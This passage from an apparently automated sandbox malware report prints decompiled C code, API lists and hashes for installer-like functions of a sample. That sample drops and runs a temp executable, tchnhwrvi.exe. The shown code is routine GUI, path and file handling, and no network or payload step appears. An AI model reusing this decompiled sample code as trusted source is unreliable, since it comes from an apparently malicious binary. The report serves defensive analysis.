                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                    • SelectObject.GDI32(00000000,?), ref: 00401140
                    • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                    • DeleteObject.GDI32(?), ref: 00401165
                    • EndPaint.USER32(?,?), ref: 0040116E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                    • String ID: F
                    • API String ID: 941294808-1304234792
                    • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                    • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                    • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                    • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 72%
                    			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                    0x004066a5
                    0x004066a5
                    0x004066a5
                    0x004066ab
                    0x004066b0
                    0x004066c1
                    0x004066c1
                    0x004066c9
                    0x004066ca
                    0x004066cb
                    0x004066cc
                    0x004066cf
                    0x004066d7
                    0x004066d9
                    0x004066ea
                    0x004066ed
                    0x004066ed
                    0x004066f1
                    0x004066f7
                    0x004066fa
                    0x004068d5
                    0x004068d5
                    0x004068e0
                    0x004068ec
                    0x004068ec
                    0x00000000
                    0x00406700
                    0x00406705
                    0x0040671a
                    0x0040671b
                    0x00406721
                    0x004068b3
                    0x004068c1
                    0x004068c4
                    0x004068c4
                    0x004068b5
                    0x004068b8
                    0x004068bb
                    0x004068bd
                    0x004068bd
                    0x004068c6
                    0x004068c6
                    0x004068cc
                    0x004068cf
                    0x00406702
                    0x00000000
                    0x00406702
                    0x00000000
                    0x004068cf
                    0x00406727
                    0x0040672a
                    0x00406739
                    0x00406740
                    0x0040674c
                    0x0040674f
                    0x00406752
                    0x00406753
                    0x00406758
                    0x0040675e
                    0x00406761
                    0x00406764
                    0x00406857
                    0x0040685c
                    0x0040688f
                    0x00406894
                    0x00406899
                    0x0040689e
                    0x0040689e
                    0x004068a3
                    0x004068a9
                    0x004068ac
                    0x00000000
                    0x004068ac
                    0x0040685e
                    0x00406861
                    0x00406864
                    0x00406879
                    0x00406880
                    0x00406866
                    0x0040686d
                    0x0040686d
                    0x00406888
                    0x0040688b
                    0x0040684f
                    0x00406850
                    0x00406850
                    0x00000000
                    0x0040688b
                    0x00406771
                    0x00406775
                    0x00406775
                    0x00406776
                    0x00406778
                    0x004067b5
                    0x004067b8
                    0x004067c8
                    0x004067cb
                    0x004067d3
                    0x004067d9
                    0x004067d9
                    0x00406834
                    0x00406834
                    0x00406836
                    0x00000000
                    0x00000000
                    0x004067dd
                    0x004067e2
                    0x004067e3
                    0x004067e5
                    0x004067fc
                    0x0040680a
                    0x00406810
                    0x00406812
                    0x00406830
                    0x00406830
                    0x00406830
                    0x00000000
                    0x00406830
                    0x00406818
                    0x00406821
                    0x00406824
                    0x0040682a
                    0x0040682e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040682e
                    0x004067f6
                    0x004067f8
                    0x004067fa
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004067fa
                    0x00000000
                    0x00406834
                    0x004067c0
                    0x00000000
                    0x0040677a
                    0x00406798
                    0x004067a1
                    0x0040683e
                    0x00406842
                    0x0040684a
                    0x0040684a
                    0x00000000
                    0x00406842
                    0x004067ab
                    0x00406838
                    0x0040683c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040683c
                    0x00406778
                    0x00000000
                    0x00406705

                    APIs
                    • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00000400), ref: 004067C0
                    • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                    • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                    • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Directory$SystemWindowslstrcatlstrlen
                    • String ID: "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                    • API String ID: 4260037668-1655364312
                    • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                    • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                    • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                    • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                    0x004056d0
                    0x004056da
                    0x004056df
                    0x004056e5
                    0x004056f0
                    0x004056f3
                    0x004056f6
                    0x004056fc
                    0x004056fc
                    0x00405702
                    0x0040570a
                    0x0040570d
                    0x0040572a
                    0x0040572e
                    0x00405737
                    0x00405737
                    0x00405741
                    0x0040574a
                    0x00405756
                    0x0040575d
                    0x00405761
                    0x00405764
                    0x00405777
                    0x00405785
                    0x00405785
                    0x00405789
                    0x0040578b
                    0x0040578e
                    0x00000000
                    0x0040578e
                    0x0040570f
                    0x00405717
                    0x0040571f
                    0x00405725
                    0x00000000
                    0x00405725
                    0x0040571f
                    0x0040570d
                    0x0040579a

                    APIs
                    • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                    • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                    • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                    • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                      • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                      • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: MessageSendlstrlen$lstrcat$TextWindow
                    • String ID: ('B
                    • API String ID: 1495540970-2332581011
                    • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                    • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                    • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                    • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                    0x0040463d
                    0x004046f3
                    0x00000000
                    0x004046f3
                    0x0040464e
                    0x00404652
                    0x00000000
                    0x0040466c
                    0x0040466c
                    0x00404675
                    0x00000000
                    0x00000000
                    0x00404677
                    0x00404683
                    0x00404686
                    0x00404686
                    0x0040468c
                    0x00404692
                    0x00404692
                    0x0040469e
                    0x004046a4
                    0x004046ab
                    0x004046ae
                    0x004046b1
                    0x004046b3
                    0x004046b3
                    0x004046bb
                    0x004046c1
                    0x004046c1
                    0x004046cb
                    0x004046d0
                    0x004046d3
                    0x004046d8
                    0x004046db
                    0x004046db
                    0x004046eb
                    0x004046eb
                    0x00000000
                    0x004046ee

                    APIs
                    • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                    • GetSysColor.USER32(00000000), ref: 00404686
                    • SetTextColor.GDI32(?,00000000), ref: 00404692
                    • SetBkMode.GDI32(?,?), ref: 0040469E
                    • GetSysColor.USER32(?), ref: 004046B1
                    • SetBkColor.GDI32(?,?), ref: 004046C1
                    • DeleteObject.GDI32(?), ref: 004046DB
                    • CreateBrushIndirect.GDI32(?), ref: 004046E5
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                    • String ID:
                    • API String ID: 2320649405-0
                    • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                    • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                    • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                    • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 87%
                    			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                    0x004026ec
                    0x004026ee
                    0x004026f1
                    0x004026f3
                    0x004026f6
                    0x004026fb
                    0x004026ff
                    0x00402702
                    0x00402705
                    0x00402c2a
                    0x00402c2d
                    0x0040270b
                    0x0040270b
                    0x00402712
                    0x00402714
                    0x00402714
                    0x0040271a
                    0x0040287e
                    0x0040287e
                    0x00402881
                    0x00402886
                    0x004015b6
                    0x0040292e
                    0x0040292e
                    0x00000000
                    0x00402720
                    0x00402721
                    0x0040272c
                    0x0040272f
                    0x0040273b
                    0x0040273f
                    0x004027d7
                    0x004027ef
                    0x004027ff
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402745
                    0x00402745
                    0x00402748
                    0x00402749
                    0x0040274c
                    0x00402751
                    0x00402758
                    0x00402760
                    0x00000000
                    0x00402766
                    0x00402766
                    0x0040276b
                    0x00000000
                    0x00402771
                    0x00402771
                    0x00402779
                    0x0040277c
                    0x0040277f
                    0x0040283a
                    0x00402841
                    0x00402785
                    0x0040278b
                    0x00402797
                    0x00402801
                    0x00402801
                    0x00402799
                    0x00402799
                    0x0040279c
                    0x0040279e
                    0x0040279e
                    0x0040279e
                    0x004027a1
                    0x004027a6
                    0x004027a9
                    0x00000000
                    0x00000000
                    0x004027ab
                    0x004027ae
                    0x004027bc
                    0x004027c2
                    0x004027d0
                    0x00000000
                    0x004027d2
                    0x00000000
                    0x004027d2
                    0x00000000
                    0x004027d0
                    0x0040279e
                    0x00402804
                    0x00402807
                    0x00000000
                    0x00402809
                    0x0040280e
                    0x0040284f
                    0x00402871
                    0x00402878
                    0x0040285d
                    0x0040285d
                    0x00402860
                    0x00402863
                    0x00402866
                    0x00402866
                    0x00000000
                    0x00402817
                    0x00402817
                    0x0040281a
                    0x0040281d
                    0x00402823
                    0x00402827
                    0x0040282a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040282a
                    0x0040280e
                    0x00402807
                    0x0040277f
                    0x0040276b
                    0x00402760
                    0x00000000
                    0x0040282c
                    0x0040282c
                    0x0040282f
                    0x00402838
                    0x00000000
                    0x0040272f
                    0x0040271a
                    0x00402c33
                    0x00402c39

                    APIs
                    • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                      • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
